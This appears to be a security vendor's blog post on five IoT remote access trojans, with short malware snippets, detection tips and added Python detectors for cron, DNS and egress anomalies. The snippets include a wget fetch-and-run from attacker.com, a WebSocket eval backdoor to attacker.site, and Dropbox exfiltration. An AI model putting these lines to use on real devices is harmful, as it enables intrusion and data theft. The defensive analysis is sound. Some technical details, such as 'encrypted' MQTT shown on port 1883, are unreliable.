Top 5 IoT Remote Access Trojans Crippling Devices in 2025


If you think IoT devices are just harmless smart assistants or home cameras, think again. In 2025, cybercriminals are exploiting these everyday conveniences as entry points for powerful Remote Access Trojans (RATs). I’ve tracked and reverse-engineered several IoT RATs this year, and it’s clear they’re no longer script-kiddie tools. These RATs are modular, stealthy, and devastating.

In this post, I’ll walk through five of the most dangerous IoT-focused RATs currently in the wild. But before diving in, let’s quickly establish what makes an IoT RAT different from the desktop or mobile variants.


What Are IoT Remote Access Trojans?

IoT Remote Access Trojans are malware designed specifically to target and control internet-connected devices like routers, IP cameras, smart TVs, and even refrigerators. Unlike typical RATs, which rely on full operating systems like Windows or Android, IoT RATs have to operate with minimal system resources and often without standard APIs.

That constraint has pushed their developers to get creative. Most IoT RATs:

  • Exploit weak/default credentials or outdated firmware.

  • Use lightweight payloads written in C, Lua, or Python.

  • Communicate over obscure or non-standard ports.

  • Persist using cron jobs, init scripts, or patched binaries.

Here are the top offenders I’ve come across in 2025.


1. NOIRWorm

Overview: NOIRWorm targets consumer-grade IP cameras and DVRs. It spreads laterally within home networks and uses compromised devices for surveillance or DDoS-for-hire.

Implementation Strategy:

  • Brute-forces Telnet and SSH using hardcoded credentials.

  • Drops a statically compiled MIPS binary.

  • Connects to a Tor-hidden C2 server.

Code Walkthrough (BusyBox infection shell snippet):

    # Fetch the stage-two binary into /tmp, mark it executable and run it in the background
    if wget http://attacker.com/noir -O /tmp/noir; then
        chmod +x /tmp/noir
        /tmp/noir &
    fi

Detection Tip: Monitor for unknown processes running BusyBox with network sockets open. Deploy honeypots to catch brute-force attempts.
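The persistence list above (cron jobs, init scripts, dropped binaries) and this detection tip both come down to the same host-side triage. The following is an added example, not code from the original post: it checks a snapshot collected from an embedded Linux device for cron or init entries that stage code from scratch directories or fetch it at boot, and for processes that either run from a scratch directory or are unknown BusyBox applets holding a socket. The snapshot data is constructed, and the allowlist of known network applets is an assumption you would replace with the device's real baseline.

```python
"""Triage a snapshot from an embedded Linux device for the persistence and
execution patterns discussed above. Added example; snapshot data is constructed
and the applet allowlist is assumed for a hypothetical device."""
import re
from dataclasses import dataclass

# Writable, non-persistent locations that legitimate firmware services do not run from.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# BusyBox applets this (hypothetical) device legitimately runs with sockets open.
KNOWN_NET_APPLETS = {"telnetd", "httpd", "udhcpc", "ntpd"}
# Download tools that have no business appearing in a boot-time entry.
DOWNLOAD_RE = re.compile(r"\b(wget|curl|tftp)\b")


@dataclass
class Proc:
    pid: int
    exe: str          # resolved /proc/<pid>/exe
    cmdline: str      # /proc/<pid>/cmdline with NULs replaced by spaces
    has_socket: bool  # True if any /proc/<pid>/fd entry is a socket


def check_persistence(entries):
    """Return (source, reason, line) for cron/init lines that stage or fetch code."""
    findings = []
    for source, line in entries:
        if any(d in line for d in SCRATCH_DIRS):
            findings.append((source, "runs from scratch directory", line))
        if DOWNLOAD_RE.search(line):
            findings.append((source, "fetches code at boot", line))
    return findings


def check_processes(procs):
    """Return (pid, reason, detail) for suspicious running processes."""
    findings = []
    for p in procs:
        if p.exe.startswith(SCRATCH_DIRS):
            findings.append((p.pid, "executable in scratch directory", p.exe))
        elif p.exe.endswith("/busybox") and p.has_socket:
            # argv[0] names the applet; it may be bare ("httpd") or a path ("/bin/httpd")
            applet = p.cmdline.split()[0].rsplit("/", 1)[-1]
            if applet not in KNOWN_NET_APPLETS:
                findings.append((p.pid, "unknown BusyBox applet with socket", applet))
    return findings


# Constructed snapshot: one benign cron line, one mirroring the infection snippet
# above, one init script launching from /var/tmp, and four running processes.
SNAPSHOT_PERSISTENCE = [
    ("crontab", "*/5 * * * * /usr/sbin/ntpd -q"),
    ("crontab", "@reboot wget http://203.0.113.7/noir -O /tmp/noir && /tmp/noir"),
    ("init.d/S99local", "/var/tmp/.x/relay &"),
]
SNAPSHOT_PROCS = [
    Proc(412, "/bin/busybox", "httpd -p 80", True),
    Proc(977, "/tmp/noir", "/tmp/noir", True),
    Proc(981, "/bin/busybox", "wget http://203.0.113.7/stage2 -O /tmp/s2", True),
    Proc(990, "/bin/busybox", "sh", False),
]

if __name__ == "__main__":
    for f in check_persistence(SNAPSHOT_PERSISTENCE) + check_processes(SNAPSHOT_PROCS):
        print(f)
```

On a real device the two snapshot lists would be filled from `crontab -l`, the contents of `/etc/init.d` and `/etc/rc.local`, and a walk of `/proc`; the checks themselves do not change. The scratch-directory rule is the high-signal one, since nothing in a shipped firmware image should execute from `/tmp`.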

2. IoTReaper++

Overview: An upgraded version of the original IoTReaper, this variant adds WebSocket-based C2 and support for newer smart thermostats and cameras.

Implementation Strategy:

  • Scans for web interfaces on ports 80 and 443.

  • Injects JavaScript into the device’s admin panel to create persistent sockets.

  • Controls the RAT using browser-like C2 sessions.

Code Walkthrough (Injected JavaScript payload):

    // Open a persistent WebSocket to the C2 and execute whatever text it sends
    let ws = new WebSocket('wss://attacker.site/c2');
    ws.onmessage = (event) => {
        eval(event.data);   // arbitrary code execution driven by the C2 channel
    };

Detection Tip: Analyze the source code of embedded web panels. Flag devices making unexplained persistent WebSocket connections to unknown domains.

3. ShadowBot

Overview: ShadowBot is an ARM-compiled binary that turns infected IoT devices into proxy relays and command execution nodes. It’s often found in botnets used for anonymizing cybercrime.

Implementation Strategy:

  • Uses UPnP to expose internal ports.

  • Installs custom iptables rules to route traffic.

  • Periodically polls a C2 server via DNS.

Code Walkthrough (Embedded DNS C2 resolver in C):

    /* Resolve the C2 domain; the resolved record carries the tasking */
    char *lookup_domain = "cmd.shadowdns.co";
    struct hostent *host = gethostbyname(lookup_domain);
    if (host) {
        execute_command(host->h_addr);   /* first resolved address handed to the command handler */
    }

Detection Tip: Use deep DNS inspection. Any IoT device resolving a domain multiple times per minute should raise a red flag.
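The "multiple times per minute" rule above is easy to turn into detection logic. This is an added example, not code from the original post: it reads time-ordered DNS log lines, keeps a sliding 60-second window per (client, domain) pair, and reports any pair that exceeds a query threshold. It generalises slightly beyond the tip by collapsing each query name to its registered domain, so a C2 that rotates subdomains (as the constructed sample does) is still counted as one domain. The log format (epoch seconds, client IP, queried name) and the threshold are assumptions.

```python
"""Flag devices that resolve the same domain more than THRESHOLD times inside any
60-second window. Added example; log lines are constructed and the format is assumed."""
from collections import defaultdict, deque

WINDOW_SECONDS = 60
THRESHOLD = 5  # queries per window per (client, domain); tune to the fleet's normal behaviour

# Constructed sample: a thermostat doing normal NTP/vendor lookups and a camera
# polling a suspected C2 domain every ~10 seconds through rotating subdomains.
SAMPLE_LOG = """\
1717000000 192.168.1.20 pool.ntp.org
1717000002 192.168.1.31 a1.cmd.shadowdns.co
1717000012 192.168.1.31 b7.cmd.shadowdns.co
1717000020 192.168.1.20 firmware.vendor.example
1717000022 192.168.1.31 c3.cmd.shadowdns.co
1717000032 192.168.1.31 d9.cmd.shadowdns.co
1717000042 192.168.1.31 e2.cmd.shadowdns.co
1717000052 192.168.1.31 f5.cmd.shadowdns.co
1717000300 192.168.1.20 pool.ntp.org
"""


def registered_domain(name):
    """Collapse a query name to its last two labels so rotating subdomains aggregate."""
    labels = name.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def parse(log_text):
    """Yield (timestamp, client, domain) from the assumed whitespace-separated format."""
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, name = line.split()
        yield int(ts), client, registered_domain(name)


def find_polling(log_text, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Return {(client, domain): peak_count} for pairs exceeding the threshold.

    Input must be time-ordered; each deque holds only timestamps inside the window.
    """
    recent = defaultdict(deque)
    alerts = {}
    for ts, client, domain in parse(log_text):
        key = (client, domain)
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] >= window:
            q.popleft()
        if len(q) > threshold:
            alerts[key] = max(alerts.get(key, 0), len(q))
    return alerts


if __name__ == "__main__":
    for (client, domain), count in find_polling(SAMPLE_LOG).items():
        print(f"{client} resolved {domain} {count} times within {WINDOW_SECONDS}s")
```

In production the same loop runs over a resolver or Zeek `dns.log` feed; the one thing worth tuning is the threshold, because some legitimate devices also poll a vendor endpoint on a short interval and belong on a per-domain allowlist rather than in the alert stream.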

4. MiraiX

Overview: MiraiX is the latest variant of the infamous Mirai botnet, redesigned for microcontrollers in smart meters and smart locks. It’s smaller, harder to detect, and runs on embedded RTOS environments.

Implementation Strategy:

  • Compiled with stripped symbols to reduce binary footprint.

  • Injects itself into firmware memory.

  • Uses MQTT for encrypted communication.

Code Walkthrough (MQTT Client Init in C++):

    // Connect to the broker (port 1883, the plaintext MQTT port) and run every message
    // published on the command topic
    MQTTClient client("iot-server.local", 1883);
    client.setCallback([](std::string topic, std::string msg) {
        execute_command(msg.c_str());
    });
    client.subscribe("/iot/cmd");

Detection Tip: Inspect outbound MQTT connections. Unexpected connections to public brokers, or encrypted MQTT over TCP/8883 from a device that has no reason to use it, are often suspicious.

5. PyWasp

Overview: PyWasp is a Python-based RAT deployed on Raspberry Pi-based IoT devices in industrial control systems. It’s designed for persistence and low-noise data theft.

Implementation Strategy:

  • Installs via SSH using stolen keys.

  • Uses cron jobs to survive reboots.

  • Sends logs and screen captures to Dropbox or Mega.

Code Walkthrough (Main loop):

    import dropbox

    # Authenticate with a hardcoded token and push the collected log to the attacker's account
    client = dropbox.Dropbox('ACCESS_TOKEN')
    with open('/tmp/metrics.log', 'rb') as f:
        client.files_upload(f.read(), '/metrics.log')

Detection Tip: Audit cron jobs and SSH keys on embedded Linux systems. Flag IoT traffic to cloud storage services like Dropbox or Mega.
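Three of the detection tips above (IoTReaper++'s persistent WebSockets to unknown domains, MiraiX's MQTT to unexpected brokers, and PyWasp's uploads to Dropbox or Mega) are really one control: an egress allowlist for the IoT segment, with labels for the patterns that matter. The following is an added example, not code from the original post or from any of the tools it mentions. It applies a per-device-class allowlist to connection records and labels each violation. The record format (device, device class, destination host as seen in DNS or TLS SNI, port, application label, duration) and the allowlist entries are assumptions; `attacker.site` is the domain from the IoTReaper++ snippet, the other hosts are constructed.

```python
"""Egress-policy check for an IoT segment. Added example; record format, allowlist
and sample flows are constructed for a hypothetical fleet."""
from dataclasses import dataclass

CLOUD_STORAGE_EXACT = {"dropbox.com", "mega.nz", "mega.co.nz"}
CLOUD_STORAGE_SUFFIXES = (".dropbox.com", ".dropboxapi.com", ".mega.nz", ".mega.co.nz")
MQTT_PORTS = {1883, 8883}
LONG_LIVED_SECONDS = 300  # a WebSocket open this long is a session, not a page load

# Per-device-class egress allowlist (assumed for this fleet).
ALLOWLIST = {
    "camera": {"cloud.cam-vendor.example", "pool.ntp.org"},
    "thermostat": {"api.thermo-vendor.example", "pool.ntp.org"},
    "smartlock": {"mqtt.lock-vendor.example", "pool.ntp.org"},
    "pi-gateway": {"apt.raspberrypi.example", "pool.ntp.org"},
}


@dataclass
class Flow:
    device: str
    device_class: str
    dst_host: str     # from DNS answer correlation or TLS SNI
    dst_port: int
    app: str          # e.g. "tls", "wss", "mqtt", "http", "udp"
    duration: float   # seconds the connection stayed open


def is_cloud_storage(host):
    return host in CLOUD_STORAGE_EXACT or host.endswith(CLOUD_STORAGE_SUFFIXES)


def classify(flow):
    """Return labels for one flow; an empty list means the flow matches policy."""
    host = flow.dst_host.lower()
    if host in ALLOWLIST.get(flow.device_class, set()):
        return []
    labels = []
    if is_cloud_storage(host):
        labels.append("cloud-storage-upload")
    if flow.dst_port in MQTT_PORTS or flow.app == "mqtt":
        labels.append("mqtt-to-unknown-broker")
    if flow.app in ("ws", "wss") and flow.duration >= LONG_LIVED_SECONDS:
        labels.append("persistent-websocket-to-unknown-host")
    if not labels:
        labels.append("egress-outside-allowlist")
    return labels


def triage(flows):
    """Map (device, destination) to its labels for every flow that violates policy."""
    findings = {}
    for f in flows:
        labels = classify(f)
        if labels:
            findings[(f.device, f.dst_host)] = labels
    return findings


# Constructed sample flows: two benign, one of each pattern, one generic violation.
SAMPLE_FLOWS = [
    Flow("cam-01", "camera", "cloud.cam-vendor.example", 443, "tls", 12.0),
    Flow("cam-02", "camera", "attacker.site", 443, "wss", 3600.0),
    Flow("lock-07", "smartlock", "mqtt.lock-vendor.example", 8883, "mqtt", 900.0),
    Flow("lock-09", "smartlock", "public-broker.example", 1883, "mqtt", 900.0),
    Flow("pi-03", "pi-gateway", "content.dropboxapi.com", 443, "tls", 4.0),
    Flow("thermo-04", "thermostat", "pool.ntp.org", 123, "udp", 0.1),
    Flow("thermo-05", "thermostat", "updates.unknown.example", 80, "http", 2.0),
]

if __name__ == "__main__":
    for key, labels in triage(SAMPLE_FLOWS).items():
        print(key, labels)
```

The allowlist is the real work: it has to be built per device class from a few days of clean traffic and then enforced at the segment firewall, with this classifier running on the denied or logged flows so that the labels tell an analyst which of the patterns above they are looking at rather than just "blocked".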

Conclusion

IoT devices are often treated as background infrastructure – plug them in, forget them. That mindset is what allows these RATs to flourish. They exploit weak configurations, hide in firmware, and communicate over unexpected protocols.

From Tor tunnels in IP cameras to MQTT in smart locks, 2025’s IoT RATs are sophisticated and quiet. They don’t just disrupt your smart home; they infiltrate corporate networks through rogue smart plugs and HVAC units.

I recommend using device discovery tools like Nmap with custom IoT signatures and combining them with memory analysis tools like Volatility or network behavior analysis with Suricata. If you’re a blue teamer, start segmenting IoT traffic, applying outbound firewall rules, and watching those low-bandwidth anomalies.


Why Businesses Trust SecureMyOrg for Comprehensive Network Security

At SecureMyOrg, we uncover and fix security vulnerabilities in mobile and web applications, while providing solutions to mitigate risks. We are trusted by renowned companies like Yahoo, Gojek and Rippling, and with 100% client satisfaction, you’re in safe hands!

Some of the things people reach out to us for –

  1. Building their cybersecurity program from scratch – setting up cloud security using cost-effective tools, SIEM for alert monitoring, and building policies for the company
  2. Vulnerability Assessment and Penetration Testing (VAPT) – we have certified professionals, with certifications like OSCP, CREST CPSA & CRT, CKA and CKS
  3. DevSecOps consulting
  4. Red Teaming activity
  5. Regular security audits before product release
  6. Full-time security engineers
